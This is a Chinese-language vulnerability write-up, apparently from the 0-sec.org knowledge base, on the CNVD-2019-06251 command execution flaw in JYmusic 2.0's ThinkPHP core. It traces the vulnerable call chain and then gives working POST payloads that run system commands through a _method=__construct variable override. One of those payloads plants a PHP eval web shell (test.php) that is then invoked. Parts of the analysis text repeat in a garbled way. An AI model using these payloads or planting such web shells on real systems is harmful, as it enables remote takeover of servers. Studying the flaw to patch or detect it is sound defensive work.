(CNVD-2019-06251)JYmusic 2.0 命令执行漏洞

一、漏洞简介

CNVD-2019-06251

二、漏洞影响

三、复现过程

漏洞分析

危险函数

/core/library/think/Request.php类中的filterValue函数中,使用了call_user_func函数。

image

通过构造使得$filter=system, $value=dir ,通过call_user_func函数即可执行系统命令” dir ”。

array_walk_recursive函数

/core/library/think/Request.php类中的input函数里调用了通过array_walk_recursive函数调用了filterValue函数。array_walk_recursive() 函数对数组中的每个元素应用用户自定义函数。

image

image

input函数

/core/library/think/Request.php中的param函数调用了input函数。

image

image

exec 函数

/core/library/think/App.php类中的exec 函数通过Request::instance()->param()调用了param函数。

image

run函数

/core/library/think/App.php类中的run函数则调用了exec函数

image

传入的dispatch和dispatch和dispatch和config两个参数分别来自于/core/library/think/App.php类中run函数里的:

image

image

变量覆盖

/core/library/think/App.php类中run函数里,获取dispatch变量值时调用了routeCheck函数。routeCheck函数中则通过Route::chekc调用了check函数。/core/library/think/Route.php类中,check函数通过dispatch变量值时调用了routeCheck函数。routeCheck函数中则通过Route::chekc调用了check函数。/core/library/think/Route.php类中,check函数通过dispatch变量值时调用了routeCheck函数。routeCheck函数中则通过Route::chekc调用了check函数。/core/library/think/Route.php类中,check函数通过request->method()调用了method函数。

/core/library/think/Request.php类中,通过post参数_method=__construct调用构造函数:

image

在构造函数里用filter=system覆盖类中的filter变量。

image

post参数 method=GET 就是要再次调用method函数,并且使得if(true===$method)为真,从而获取 _SERVER[REQUEST_METHOD]=dir 这个参数值。

image

调用入口

/core/library/think/App.php类中的run函数,则是在index.php入口函数中调用。

漏洞复现

拦截首页请求,Change request method修改请求方式为POST

参数:

image

POST的参数的作用已在漏洞分析环节分析。 filter=system&_SERVER[REQUEST_METHOD]=dir&_method=__construct&method=GET POST参数后不能有\r\n回车换行,如果有就不能成功执行。 POST /captcha HTTP/1.1 //请求一个验证码,引导程序的运行步骤。

写入shell

image

filter=system&_SERVER[REQUEST_METHOD]=echo “<?php @eval($_GET["test"]) ?>” >test.php&_method=__construct&method=GET

phpinfo()

image

http://0-sec.org/test.php?test=phpinfo(); 

//末尾一定要跟一个“分号” “ ; ” ,如果没有则不能成功执行。

四、参考链接

https://blog.csdn.net/yun2diao/article/details/91345116

零组资料文库 all right reserved,powered by 0-sec.org未经授权禁止转载 2019-12-16 19:42:42

results matching ""

    No results matching ""